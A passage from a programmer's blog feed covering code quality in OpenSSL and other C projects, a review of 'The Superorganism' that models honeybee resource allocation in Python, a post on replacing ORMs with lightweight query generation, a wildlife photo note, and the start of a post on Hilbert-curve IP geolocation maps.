</span><span style="color:#b48ead;">break</span><span style="color:#c0c5ce;">;
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(ret == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">)
{
ret = </span><span style="color:#bf616a;">sk_X509_NAME_new_null</span><span style="color:#c0c5ce;">();
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(ret == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">)
{
</span><span style="color:#bf616a;">SSLerr</span><span style="color:#c0c5ce;">(SSL_F_SSL_LOAD_CLIENT_CA_FILE,ERR_R_MALLOC_FAILURE);
</span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
}
}
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">((xn=</span><span style="color:#bf616a;">X509_get_subject_name</span><span style="color:#c0c5ce;">(x)) == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
</span><span style="color:#65737e;">/* check for duplicates */</span><span style="color:#c0c5ce;">
xn=</span><span style="color:#bf616a;">X509_NAME_dup</span><span style="color:#c0c5ce;">(xn);
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(xn == </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#b48ead;">goto</span><span style="color:#c0c5ce;"> err;
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">sk_X509_NAME_find</span><span style="color:#c0c5ce;">(sk,xn) >= </span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">X509_NAME_free</span><span style="color:#c0c5ce;">(xn);
</span><span style="color:#b48ead;">else
</span><span style="color:#c0c5ce;">{
</span><span style="color:#bf616a;">sk_X509_NAME_push</span><span style="color:#c0c5ce;">(sk,xn);
</span><span style="color:#bf616a;">sk_X509_NAME_push</span><span style="color:#c0c5ce;">(ret,xn);
}
}
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">)
{
err:
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(ret != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#bf616a;">sk_X509_NAME_pop_free</span><span style="color:#c0c5ce;">(ret,X509_NAME_free);
ret=</span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">;
}
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(sk != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#bf616a;">sk_X509_NAME_free</span><span style="color:#c0c5ce;">(sk);
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(in != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#bf616a;">BIO_free</span><span style="color:#c0c5ce;">(in);
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(x != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">) </span><span style="color:#bf616a;">X509_free</span><span style="color:#c0c5ce;">(x);
</span><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(ret != </span><span style="color:#d08770;">NULL</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">ERR_clear_error</span><span style="color:#c0c5ce;">();
</span><span style="color:#b48ead;">return</span><span style="color:#c0c5ce;">(ret);
}
</span><span style="color:#b48ead;">#endif
</span></code></pre>
<p>His objections boil down to the following:</p>
<ul>
<li>The indentation style is weird, and in many circumstances hard to parse.</li>
<li>The project uses a mixture of CamelCase and underscore-based function naming.</li>
<li>The error cleanup strategy is bizarre - using a goto to jump into code
guarded by an "if(0)" is distinctly unlovely.</li>
<li>In this example, the function name mis-characterises what the function
actually does. The somewhat shame-faced comment doesn't fix the problem, it
just makes it funny.</li>
<li>The project suffers from ifdef-itis.</li>
<li>Most importantly, the code does not "read" well. In this case, we find
multiple levels of indirection, and no clear flow to the function.</li>
</ul>
<p>So, while Marco's problem <em>started</em> with the project's shoddy documentation and
API, his actual code criticism focuses on issues that are apparently
superficial. He hasn't discovered a substantive bug or architectural weakness in
the snippet above. Instead, what matters to him are simple virtues like
consistency, style, and readability. Marco is saying, in fact, that the OpenSSL
code sucks because it lacks superficial beauty. I couldn't agree with this
position more.</p>
<p>I'm reminded of a recent blog post describing "the perfect interview question"
for programmers: ask them what bothered them most when reviewing other people's
code. The blogger argued that a response focusing on superficial code quality
meant that the interviewee was obviously not an "architectural thinker", and was
therefore a poor candidate. This is utter tripe. Good programmers know that a
lack of superficial code quality and consistency is the <em>best</em> indicator of
deeper systemic problems in a project. If you ever need a quick estimate of the
quality of a codebase, this is what you should look at first. If you ever have
to work on a project with poor code quality, fix the superficial issues first.
Ugly code will obscure deeper architectural issues, increase defect rates, make
code review hell, and make the project hard to refactor. This is advice so basic
that it usually does not need to be given - good coders understand the
importance of superficial beauty at such a deep instinctive level that they will
feel <em>compelled</em> to fix cleanliness and neatness issues before working on deeper
problems.</p>
<p>Superficial beauty is not something that is discussed nearly enough in the Open
Source world, so I'm going to don my flame-retardant poncho, and name some
names. In keeping with this post's starting point, I'm going to focus on
projects in C. Let's start with the ugly. The codebase for
<a href="http://www.vim.org/">Vim</a>, a tool that I spend hours using every day, turns out
to be a frightening and inscrutable thicket of #ifdefs. The Linux kernel is
immensely variable in quality - some of it is very good, some of it - especially
less widely used drivers - is unspeakable. The <a href="http://www.mutt.org/">mutt</a>
codebase is pretty terrible, prominently featuring one of my pet bugaboos -
mixing tabs and spaces, invisibly screwing up indentation depending on your
editor configuration. The <a href="http://www.wireshark.org/">Wireshark</a> packet sniffer -
another project I use daily - is so bad that OpenBSD <a href="http://www.openbsd.org/cgi-bin/cvsweb/ports/net/ethereal/Attic/Makefile?hideattic=0">opted to
remove</a>
it from their ports tree rather than encourage their users to use it. Wireshark
wins a special prize for over-commenting. They've clearly abandoned all hope of
communicating their intentions through the code itself, degenerating instead to
things like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#65737e;">/* Now bump the count. */
</span><span style="color:#c0c5ce;">(*argc)++;
</span></code></pre>
<p>I'll end the post on a high note, with some examples of great code quality.
OpenBSD is undoubtedly one of the pin-up projects of the Open Source world,
featuring code that is almost supernaturally clean, consistent and direct. If
you're interested in taking a look, I recommend starting with some of their
recent daemon development - their
<a href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/smtpd/?sortby=date#dirlist">SMTP</a>
and <a href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.sbin/ntpd/?sortby=date">NTP</a>
daemons are good candidates. Another excellent project to look at is the C
Python interpreter, which shares many of OpenBSD's virtues. Note that I mean the
interpreter itself - the standard library is unexpectedly variable in
quality. A more obscure project with great code quality is the <a href="http://plan9.bell-labs.com/sources/plan9/sys/src/">Plan9 operating
system</a>. Sadly, Plan9 never
took off (perhaps because it wasn't free software from the beginning), but the
codebase illustrates many of the sound principles outlined by Kernighan and
Pike - both of whom were involved in Plan9 - in <a
href="https://www.amazon.com/Practice-Programming-Addison-Wesley-Professional-Computing/dp/020161586X">The
Practice of Programming</a>.</p>
<p><strong>edit:</strong> Meanwhile, over on
<a href="http://www.reddit.com/r/programming/comments/a0s6o/in_praise_of_superficial_beauty_a_followup_to/">reddit</a>
dagbrown has pointed out
<a href="http://opensource.apple.com/source/procmail/procmail-1.2/procmail/src/procmail.c">procmail</a>,
which turns out to be an absolutely unparalleled phenomenon. Go on, have a look - I dare ya.</p>
Non-programming books for Programmers: The Superorganism, Hölldobler & Wilson
2009-10-25T00:00:00+00:00
2009-10-25T00:00:00+00:00
https://corte.si/posts/books/superorganism/
<div class="media">
<a href="https://www.amazon.com/Superorganism-Beauty-Elegance-Strangeness-Societies/dp/0393067041/ref=sr_1_1?dchild=1&keywords=superorganism&qid=1592693625&s=books&sr=1-1">
<img src="superorganism-cover.jpg" />
</a>
<div class="subtitle">
Superorganism
</div>
</div>
<p>It's impossible to talk about <em>The Superorganism</em> without first mentioning <a href="http://en.wikipedia.org/wiki/Bert_Holldobler">Bert
Hölldobler</a> and <a href="http://en.wikipedia.org/wiki/E._O._Wilson">E. O.
Wilson</a>'s most famous collaboration -
a book called simply <em>The Ants</em>. I've been fascinated with ants since childhood,
and <em>The Ants</em> is one of my favourite books - deep enough to be intellectually
satisfying on almost any detail, and broad enough to be one of those rare books
that summarizes nearly everything to be said about its subject. It's hard to
avoid platitudes like "authoritative" and "magisterial" when talking about a
book like this, so I will resort to a simple computer science analogy: <em>The
Ants</em> is to the study of ants what <em>The Art of Computer Programming</em> is to the
study of algorithms. Only more so, because unlike Knuth, Hölldobler and Wilson
actually completed their survey in 1990. It should be no surprise then, that I
had <em>The Superorganism</em> on pre-order as soon as I heard that Hölldobler and
Wilson were publishing their first new book in almost two decades. <em>The
Superorganism</em> expands on a theme that also lies at the heart of <em>The Ants</em> -
the workings of insect societies. <em>The Superorganism</em> paints with a broader
brush than its predecessor, touching frequently on the other great families of
eusocial insects - termites, bees and wasps.</p>
<div class="media">
<a href="atta_cephalotes.jpg">
<img src="atta_cephalotes.jpg" />
</a>
<div class="subtitle">
Atta cephalotes, Costa Rica
</div>
</div>
<p>If you haven't delved into the world of social insects before, you're in for a
treat. The range and complexity of social insect behaviour can be weirder and
more wonderful than anything found in science fiction. Consider, for example,
the lives of what the authors call the "ultimate superorganism": the
<a href="http://en.wikipedia.org/wiki/Attini">Attine</a> leafcutter ants. The remarkable
fact about the leafcutters is that they are farmers, cultivating vast fungal
gardens that provide them with essential nutrients. These fungal gardens are
grown on a substrate of leaf-matter, and leafcutters get their name from the
fact that colonies cut up enormous quantities of leaves to transport back to
their nests - one mature colony was estimated to harvest a leaf area of 4550
square meters per year. The fungus gardens are the lifeblood of the leafcutter
colony, and they are tended with endless patience and skill. Leaves brought back
to the nest are snipped up, molded into pellets, and carefully planted with
fungal hyphae taken from elsewhere in the garden. Workers patrol the fungal
gardens ceaselessly, weeding out foreign fungal strains and other contaminants.
The ants secrete antibiotics that inhibit the growth of other fungi, and produce
growth hormones that enhance the growth of their own strain. They wage an
endless battle against <em>Escovopsis</em>, a parasitic species of fungus that
specialises in invading Attine leafcutter gardens. Remarkably, an important
part of their arsenal is a second symbiont: a bacterium that only occurs on the
cuticle of leafcutter ants, which produces powerful antibiotics specific to the
fungal pest. The ants grow these bacterial weapons on special patches of
cuticle, modified specifically to house them. There is also a degree of
communication between the ants and their garden fungus. Leafcutter ants are
sensitive to the chemical signals released by distressed fungus, and learn to
avoid food that harms their gardens. When a new queen leaves the nest to mate
and establish a colony of her own, she carries a sample of the fungus from her
parent colony in a cavity next to her oesophagus. Once she has found a likely
nesting spot, she spits out the fungal sample, and tends the growing cultivar as
closely as she does her own offspring, feeding it with secreted fluid, while she
herself subsists off her own bodyfat. Once the first brood of workers have been
raised, the queen assumes her proper position as the egg-laying machine at the
center of the colony, feeding on unfertilized eggs laid by her workers. If her
colony is successful, she will produce about 20 eggs a minute, 24 hours a day,
resulting in between 150 and 200 million offspring during her life. The colony
can consist of several million ants at any one time. This population is housed
in a colossal nest - one typical example had 1920 chambers with 238 fungus
gardens. To build it, the ants had to shift 40 tonnes of soil. The nest itself
is designed to provide optimal ventilation and humidity for the fungal gardens,
and is continually adjusted by the ants to achieve the right conditions.
Stretching out from the nest is a set of foraging tunnels that surface into a
web of trunk routes along which leaf material is brought back to the nest.
Trunk routes are meticulously maintained, with "road workers" clearing debris
and encroaching vegetation. Within the ant population there are a range of
physical castes, each adapted to a specific set of jobs. The smallest workers
maintain and patrol the fungal gardens. The largest are gigantic supersoldiers
that specialise in deterring vertebrate predators. Underpinning all of this is a
sophisticated chemical communication system, involving a huge array of
pheromones, and an incredibly sensitive sensory system. Hölldobler and Wilson
cite research that shows that one milligram of the trail pheromone of <em>Atta
texana</em> is enough to lead a worker 60 times around the Earth.</p>
<p>Ponder for a moment the immense behavioural complexity required to sustain a
sophisticated insect civilization like this. There are an extraordinary number
of behaviours that need to be optimized, many of which read like they are
straight from the pages of a programming competition. Foraging strategies need
to be devised to efficiently discover food sources. Once a food source is
discovered, its value needs to be estimated, and the right fraction of the
colony's labour pool needs to be allocated to exploit it. Throughput needs to be
optimised by selecting the right leaf fragment size, while minimizing the
significant energetic cost of cutting leaves up smaller than necessary. The cost
of constructing and maintaining the web of trunk routes needs to be weighed
against the efficiency benefits gained (it turns out that they can improve
foraging speed tenfold). There are many, many other interesting sub-problems
like these, and the colony solves them all admirably. The entire system reminds
one of a super-complicated real-time strategy game, and we can be forgiven for
suspecting that there must be some hyper-intelligent controller micromanaging a
<a href="http://starcraft.wikia.com/wiki/Zerg">Zerg-like</a> expansion of the nest. Here,
however, we come to perhaps the most remarkable fact about social insects: their
colonies are leaderless. There is no central strategist at all - their entire
range of sophisticated behaviour is emergent, arising from the aggregate actions
of many small simple units with only local information. And yet, millions of
ants can act with such apparent coherence and purpose that biologists like
Hölldobler and Wilson have started thinking of colonies as organisms in
themselves - "superorganisms" that compete, mate, and strive for survival.</p>
<p>Humanity has not yet learned how to cross the chasm that separates the
individual ant from the superorganism. We've seen the early glimmers of
technologically produced distributed systems - one thinks of things like the
Internet, peer-to-peer networks, and maybe some nebulous social constructs like
"the blogosphere". The fact is, however, that we are simply incapable of
designing distributed systems that even begin to approach the robustness and
intricacy of insect colonies. <em>The Superorganism</em> is certainly not a manual for
applying insectoid principles of distributed engineering to technological
problems. It is, however, the best available overview of the best distributed
systems we know of, and for that reason alone should be on every intellectually
curious computer scientist's bookshelf.</p>
<h2 id="bees-resource-allocation-peer-to-peer-communication-and-tiered-architectures">Bees: resource allocation, peer-to-peer communication and tiered architectures</h2>
<div class="media">
<a href="waggle-dance.jpg">
<img src="waggle-dance.jpg" />
</a>
<div class="subtitle">
The essential form of the honeybee waggle dance, p. 170 of The Superorganism. Reproduced here with the kind permission of its creator, <a href='http://www.margynelson.com/RumfordGraphics-Front-Page.html'>Margaret Nelson</a>
</div>
</div>
<p>That's all very exciting, but it's not very concrete. So, for the second part of
this review, I'll look at one example of distributed problem solving covered in
<em>The Superorganism</em>, and explore its fascinating parallels with computer science.</p>
<p>The best-studied insect society is surely that of <em>Apis mellifera</em>, the
honeybee. In 1947 <a href="http://en.wikipedia.org/wiki/Karl_von_Frisch">Karl von
Frisch</a> famously decoded part of
the "dance language" of the honeybee, showing that the bee <a href="http://en.wikipedia.org/wiki/Waggle_dance">waggle
dance</a> was used to convey precise
information about the distance, direction and quality of a food source to nearby
bees. The amazing discovery that bees conveyed complex abstract notions of this
type to each other gave us an early insight into the wonder of social insect
communication. Over the years since von Frisch's discovery, it has gradually
emerged that the waggle dance is just one of a complex set of signals used to
implement a distributed resource allocation strategy inside the bee colony. The
bees in a hive are loosely specialised into "foragers", who go out of the hive
to gather food, and "nectar processors", who remain in the hive to receive
nectar from incoming foragers for processing and storage. When a forager returns
to the nest laden with pollen and nectar, it searches until it finds a free
processor to accept its cargo. The first optimisation problem the hive faces is
to balance these two populations of specialists, minimising the waiting time for
foragers dropping off their cargos as well as idle time for processors waiting
to accept them. The second optimisation problem arises from the fact that the
supply of nectar sources is not constant - if a new grove of flowers in bloom is
discovered, the hive has to divert resources to exploit it as quickly as
possible, adjusting the number of foragers and processors to match. This is
complicated by the fact that not all nectar sources are equal: some might be
particularly rich, and therefore require more foragers to exploit. A particular
bee hive might be extracting nectar from a number of flower patches at the same
time, and foragers need to be allocated optimally, and continually re-balanced.
Remarkably, the bee colony accomplishes these goals without any central
co-ordination, using an entirely distributed algorithm. To see how they do this,
we need to flesh out the bee dance language somewhat. Hölldobler and Wilson
describe three basic bee dances:</p>
<ul>
<li><strong>Waggle dance</strong>: The famous dance discovered by von Frisch, which directs
forager bees to a specific resource with precise information on the location
and distance.</li>
<li><strong>Shaking dance</strong>: Recruits more bees to foraging, sending them to the dance
floor to look for waggle dancers.</li>
<li><strong>Tremble dance</strong>: Induces waggle dancers to stop dancing, and recruits bees
to nectar processing.</li>
</ul>
<p>These dances are signals that provide the communications framework for the "bee
algorithm", sketched out by Hölldobler and Wilson in the following set of
decision rules:</p>
<blockquote>
<p>1 | Not enough nectar collectors in the field? If yes, and you also
have immediate knowledge of a producing flower patch, perform the
waggle dance.</p>
<p>2 | Is the flower patch rich or the weather fine or the day early or
does the colony need substantially more food? Perform the dance with
appropriately greater vivacity and persistence.</p>
<p>3 | Not enough active foragers to send into the field? Perform the
shaking maneuver.</p>
<p>4 | Not enough nectar processors in the hive to handle the nectar
inflow? Perform the tremble dance.</p>
</blockquote>
<p>So, how do bees decide if there are too many foragers or too many nectar
processors, using purely local information? The answer is simple and elegant: if
a returning forager experiences a wait time of 20 seconds or less before finding
a nectar processor, they assume that there is a surplus of processors and
recruit more bees to foraging through the waggle dance. If they experience a
wait time of 50 seconds or more, they assume that there are too many foragers,
and use the tremble dance to both reduce the number of foragers and increase the
number of processors. Notice that all the signals used in this system are "peer
to peer" - bees only communicate with nearby bees that are in the hive at the
moment of communication.</p>
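<p>The wait-time rule is concrete enough to sketch as code. Here is a toy model in Python - the 20- and 50-second thresholds are taken from the description above, while the function names and the one-bee-at-a-time rebalancing step are my own invention for illustration:</p>

```python
# Toy model of the honeybee wait-time heuristic. The 20s/50s thresholds
# come from the text; everything else is invented for illustration.
WAGGLE_THRESHOLD = 20   # wait <= 20s: processor surplus, recruit foragers
TREMBLE_THRESHOLD = 50  # wait >= 50s: forager surplus, recruit processors

def returning_forager(wait_time):
    """Which dance (if any) a returning forager performs."""
    if wait_time <= WAGGLE_THRESHOLD:
        return "waggle"   # recruit more foragers to the patch
    if wait_time >= TREMBLE_THRESHOLD:
        return "tremble"  # stop waggle dancers, recruit processors
    return None           # in between: no signal, the split is balanced

def rebalance(foragers, processors, wait_time):
    """Apply one returning forager's signal to the colony's labour split."""
    dance = returning_forager(wait_time)
    if dance == "waggle" and processors > 1:
        return foragers + 1, processors - 1
    if dance == "tremble" and foragers > 1:
        return foragers - 1, processors + 1
    return foragers, processors
```

<p>Note that each bee only ever consults its own wait time - purely local information - yet iterating this rule over many returning foragers pushes the two populations toward balance.</p>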
<p>The system described above is clear enough to implement easily, and there is a
rich range of parallels with computer science. It's not surprising, therefore,
that a bit of searching through the literature shows that a number of computer
scientists have started mining the bee resource allocation algorithm for ideas.
One nice example comes from Sunil Nakrani and <a href="http://www2.isye.gatech.edu/%7Ectovey/">Craig
Tovey</a>, who have successfully applied a
subset of the behaviour outlined above in a paper called <a href="http://www2.isye.gatech.edu/%7Ectovey/publications/papers/bee.oct19.2004.masi2.pdf">On Honey Bees and
Dynamic Allocation in an Internet Server
Colony</a>.
Consider a hypothetical data center of servers used to implement a hosted
application environment. Each application is backed by a dynamic pool of virtual
servers, and servers can be added to or removed from the pools transparently.
There is, however, a switching cost to moving resources about - re-allocating a
virtual server involves server downtime and therefore lost revenue. Application
load varies unpredictably - one day an application might be getting three hits a
day, and the next it might crop up on Reddit and have a massive load spike. The
hosting company is paid based on usage - say, per HTTP request served - and
faces the complex problem of optimally allocating its server resources to
minimize downtime and maximize revenue. Nakrani and Tovey approach this problem
by mapping the bee resource allocation system onto the server allocation
problem. In this mapping, foraging bees are the servers, and flower patches are
the applications. In nature, the bee recruitment signal - the waggle dance
described above - is triggered if a flower patch is sufficiently "profitable".
The more profitable the nectar source, the greater the "vivacity and
persistence" of the recruitment signal. Nakrani and Tovey simulated a system
where servers used a central advertboard to post recruitment adverts. In broad
terms, Nakrani and Tovey's servers were more likely to read a random advert from
the advertboard, and switch to a different application, when their current
application was less profitable. On the other hand, a server was more likely to
post an advert to recruit more servers to its application, if its application
was more profitable. The result is a distributed algorithm that performs within
about 11.5% of an omniscient resource allocator with complete knowledge of all
future HTTP requests.</p>
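<p>In rough outline, the advertboard scheme lends itself to a short simulation. The sketch below rests on my own assumptions - the class names and the probability formulas are invented for illustration, and the real model is in Nakrani and Tovey's paper:</p>

```python
import random

# Toy sketch of the advertboard scheme described above. Servers on
# profitable applications tend to post recruitment adverts; servers on
# unprofitable ones tend to read a random advert and switch. The
# probability formulas here are invented, not Nakrani and Tovey's.

class Server:
    def __init__(self, app):
        self.app = app

    def step(self, profits, board, rng):
        relative = profits[self.app] / max(profits.values())
        if rng.random() < relative:                # profitable: recruit others
            board.append(self.app)
        if board and rng.random() < 1 - relative:  # unprofitable: switch
            self.app = rng.choice(board)

def allocate(servers, profits, rounds=100, seed=0):
    rng = random.Random(seed)    # seeded for reproducibility
    for _ in range(rounds):
        board = []               # the advertboard is cleared each round
        for s in servers:
            s.step(profits, board, rng)
    return servers
```

<p>Run this with one rich application and one poor one, and the servers drift toward the rich application without any central scheduler - the same emergent rebalancing the bees achieve.</p>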
<p>Interestingly, Nakrani and Tovey also had something to teach entomologists. They
found that while the bee recruitment algorithm performed superbly when there was
a lot of variability in application load, it was outperformed by much simpler
algorithms when load was relatively static. Their simulation therefore seems to
indicate that the bee recruitment algorithm is an adaptation to variability in
nectar sources. While this blog post focuses on what computer scientists can
learn from insects, the possibility that information might flow the other way is
a fascinating one. When I first read about the loose specialisation in the
beehive, with foragers handing over their load to processors, my immediate
thought was that this described a tiered architecture. Now, there are a number
of sound non-architectural reasons why a colony would want to have some bees
specialise in foraging. Foragers tend to be the older bees in the colony, and
this makes complete sense. Foraging is a hazardous activity, and bees have a
limited lifespan. Sending out bees that are approaching the end of their lives
anyway is good economics. Hölldobler and Wilson write that this specialisation</p>
<blockquote>
<p>... causes a problem for the honeybee colony: How can the rate of food
collection, particularly of nectar, and the rate of food processing be kept
in balance?</p>
</blockquote>
<p>The computer scientist in me suspects that there may be a different way to look
at this aspect of bee behaviour. In computing we produce tiered architectures
with independent layers because they <em>improve</em> efficiency and flexibility in
various ways. I can't help but wonder if a similar benefit might support this
aspect of bee behaviour.</p>
<h2 id="postscript">Postscript</h2>
<p>One last note before I'm done. Karl von Frisch once said that</p>
<blockquote>
<p>... the life of bees is like a magic well. The more you draw from it, the
more there is to draw.</p>
</blockquote>
<p>There are some 20,000 species of bee in the world, ranging from solitary species
to the great super-societies of domestic honeybees. There are 14,000 species of
ants, 4,000 species of termite, and more than 100,000 species of wasp. Each of
these species is a unique product of evolution's boundless ingenuity, and each
has its own suite of solutions to the problems of survival. When one of these
species disappears - and they are doing so at a terrifying rate - the tragedy is
not simply that something beautiful is irretrievably gone from the world, but
also that we have lost another irreplaceable magic well to study, learn from,
and emulate. E. O. Wilson has devoted much of the latter years of his life to
the great cause of preserving our biological legacy - if you are interested in
this urgent issue (and you should be) I recommend his 2002 book <a href="https://www.amazon.com/Future-Life-Edward-Wilson/dp/0679768114">The Future of
Life</a>.</p>
A Farewell to ORMs
2009-10-12T00:00:00+00:00
2009-10-12T00:00:00+00:00
https://corte.si/posts/code/farewell-to-orms/
<p>I've been using ORMs for years, starting with my own hand-hacked library back
in the days before there were good ORMs for Python, and more recently settling
into a comfortable reliance on <a href="http://www.sqlalchemy.org/">SQLAlchemy</a>. Over
time, though, my initially rosy feelings towards ORMs have begun to sour. I
gradually realised I was spending a disproportionate amount of time trying to
coax the ORM into doing my bidding - and when I succeeded, the results were
often ugly, slow and needlessly opaque. Analysing the performance of some of
the more complicated portions of my data access layer was often painful, and I
spent cumulative hours poring over generated SQL, trying to figure out what the
ORM was doing and why. Usually, improving performance involved side-stepping the
ORM altogether. Recently, a particularly gnarly performance issue prompted me to
ditch the ORM from a project altogether, with surprisingly pleasant results.</p>
<h2 id="impedance-mismatch">Impedance mismatch</h2>
<p>Ask any programmer why they use an ORM, and the answer is likely to be
"impedance mismatch". This is a lovely phrase from a rhetorical point of view -
hovering at the edge of meaning, but nicely avoiding asserting anything that can
actually be quantified. The usual hand-wave is that impedance mismatch arises
from the tension between table-oriented relational data, and object oriented
conceptual thinking. Your Bicycle class - a subclass, naturally, of Vehicle -
might have to be reconstructed from data scattered across six different tables,
and it's a distressing possibility that none of those tables might be called
Bicycle, or indeed Vehicle. What we should aim for, the argument goes, is a
programmer's Shangri-La where we can transparently persist and restore our
objects and have the storage taken care of by some magical plumbing. Whether or
not the magical plumbing is worthwhile depends largely on how often the
abstraction breaks down. The ORM approach does so frequently. Yes, I can use an
ORM and think at the object level in the common case, but whenever I need to do
anything remotely complicated - optimising a query, say - I'm back in the land
of tables and foreign keys. In the end, the structure of data is something
fundamental that can't be simplified or abstracted away. The ORM doesn't resolve
the impedance mismatch, it just postpones it.</p>
<h2 id="a-lighter-abstraction">A lighter abstraction</h2>
<p>So, if ORMs are at best a very partial solution to the ill-defined impedance
mismatch problem, why do so many programmers swear by them? It's not that
they're all fools, it's just that ORMs solve ANOTHER practical problem much more
successfully. Most programmers who use ORMs do so simply to avoid re-writing
endless nearly identical CRUD operations for every persistable object in their
project. This isn't about any fundamental object-relational impedance mismatch -
it's simply a problem of query generation. So, this brings me to my own
difficult-to-quantify contribution to the miasma of fuzzy thinking that already
surrounds this issue: <strong>90% of the benefit most people derive from ORMs can be
gained more simply and more transparently through unashamedly table-oriented
query generation</strong>. All we need is a nice programmatic way to generate and
manipulate SQL statements... Luckily we have just such a tool in the
<a href="http://www.sqlalchemy.org/docs/05/sqlexpression.html">SQLAlchemy SQL expression
language</a> - a good, simple
and nearly complete language for working with SQL expressions from Python.</p>
<p>Pursuing this line of thought, I've ditched the ORM from a few of my projects.
Instead, I'm using a defter abstraction - a simple, lightweight framework that
uses SQLAlchemy's SQL expression language to auto-generate most queries. This
framework is unashamedly table-oriented, and exists to manipulate data at a
relational level. It clocks in at less than 150 lines of code. The database
schema is no longer defined by the ORM - instead, helper objects are built
through schema reflection. The result has been satisfying - my data layers are
better encapsulated, database interaction is more transparent, and the
conceptual complexity is much reduced. Since nothing happens magically behind
the scenes, it's easier to analyse performance, and since there is no session
layer (few projects really need one) a whole chunk of complexity has gone away.
Using reflection rather than defining the schema in code has made schema
evolution much less of a chore. I also retain other benefits usually attributed
to ORMs - the expression language abstracts away flavour differences between
databases, so I can still, for example, run a large fraction of my unit tests
against in-memory SQLite databases and deploy on PostgreSQL. I'm now gradually
migrating all my projects to this way of working.</p>
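The shape of such a framework is easy to sketch. The toy below (class and method names are mine, not the framework's) uses nothing but the standard library: it reflects a table's columns from the live schema and generates its own INSERT and SELECT statements - the same table-oriented query generation that the SQLAlchemy expression language provides far more robustly:

```python
import sqlite3

class Table:
    """Toy sketch of a reflected, table-oriented CRUD helper.
    Columns are discovered from the live schema, not declared in code."""
    def __init__(self, conn, name):
        self.conn, self.name = conn, name
        # Schema reflection: ask the database itself what columns exist.
        self.columns = [r[1] for r in conn.execute(f"PRAGMA table_info({name})")]

    def insert(self, **values):
        cols = ", ".join(values)
        marks = ", ".join("?" for _ in values)
        self.conn.execute(
            f"INSERT INTO {self.name} ({cols}) VALUES ({marks})",
            tuple(values.values()),
        )

    def select(self, **where):
        clause = " AND ".join(f"{c} = ?" for c in where) or "1=1"
        cur = self.conn.execute(
            f"SELECT * FROM {self.name} WHERE {clause}", tuple(where.values())
        )
        return [dict(zip(self.columns, row)) for row in cur]

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE bicycle (id INTEGER PRIMARY KEY, wheels INTEGER)")
t = Table(conn, "bicycle")
t.insert(id=1, wheels=2)
```

A real version would build SQLAlchemy expression objects instead of raw strings, which buys you proper quoting and dialect portability for free - but the principle is the same.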
Leopard Seal at Sandfly Bay
2009-09-09T00:00:00+00:00
2009-09-09T00:00:00+00:00
https://corte.si/posts/photos/leopardseal/
<div class="media">
<a href="leopardseal.jpg">
<img src="leopardseal-small.jpg" />
</a>
<div class="subtitle">
Leopard Seal at Sandfly Bay
</div>
</div>
<p>Took this shot on my morning walk, 15 minutes away from my home. We are usually
the only humans on this 1km beach, and we are often out-numbered 10-1 by sea
lions. The photo is of a <a href="http://en.wikipedia.org/wiki/Leopard_Seal">leopard
seal</a> - a rarity in these parts.
These sleek top-predators bear as much resemblance to the portly and <a href="http://www.flickr.com/photos/8268815@N08/3886175958/">rather
ridiculous</a> sea lions as a
labradoodle does to a wolf. This one was a juvenile - only about 2.5 meters long -
but still managed to exude a considerable amount of toothy menace.</p>
Visualising IP Geolocation
2009-09-05T00:00:00+00:00
2009-09-05T00:00:00+00:00
https://corte.si/posts/code/hilbert/explorer/
<style>
.jpexample img {
background: url(/geohilbert/ALL.png);
}
</style>
<div class="media jpexample">
<a href="/geohilbert/JP.png">
<img src="/geohilbert/JP.png" />
</a>
<div class="subtitle">
IP Addresses in Japan
</div>
</div>
<p>I'm spending a fair bit of my time working on a project that uses an IP
geolocation database to map internet addresses to countries as part of a
security survey. There are a number of these location databases available, but
comparing their quality and coverage is not trivial, so selecting one to use is
hard. I recently decided to spend a few hours looking at the problem, and got
hopelessly side-tracked into visualising the databases using the Hilbert curve.
The result is the <a href="/geohilbert/index.html">Hilbert Explorer</a>, a
mapping of the geographical location of IP addresses onto the Hilbert Curve. You
should have a play with it before reading the rest of this post.</p>
<h2 id="the-hilbert-curve-a-very-brief-introduction">The Hilbert Curve - a (very) brief introduction</h2>
<p>The <a href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert Curve</a> is a
space-filling <a href="http://mathworld.wolfram.com/Curve.html">curve</a> that
is usually produced iteratively, with the N-th step in the iteration referred to
as the "order N" curve. Here are orders 1 to 5:</p>
<table class="spacertable">
<tr>
<td><img src="h1.png"/><br>N=1</td>
<td><img src="h2.png"/><br>N=2</td>
<td><img src="h3.png"/><br>N=3</td>
<td><img src="h4.png"/><br>N=4</td>
<td><img src="h5.png"/><br>N=5</td>
</tr>
</table>
<p>To translate from one order to the next, we simply replace U-shapes like the
one in the N=1 diagram with Y-shapes like the N=2 diagram. So, in the N=1 diagram
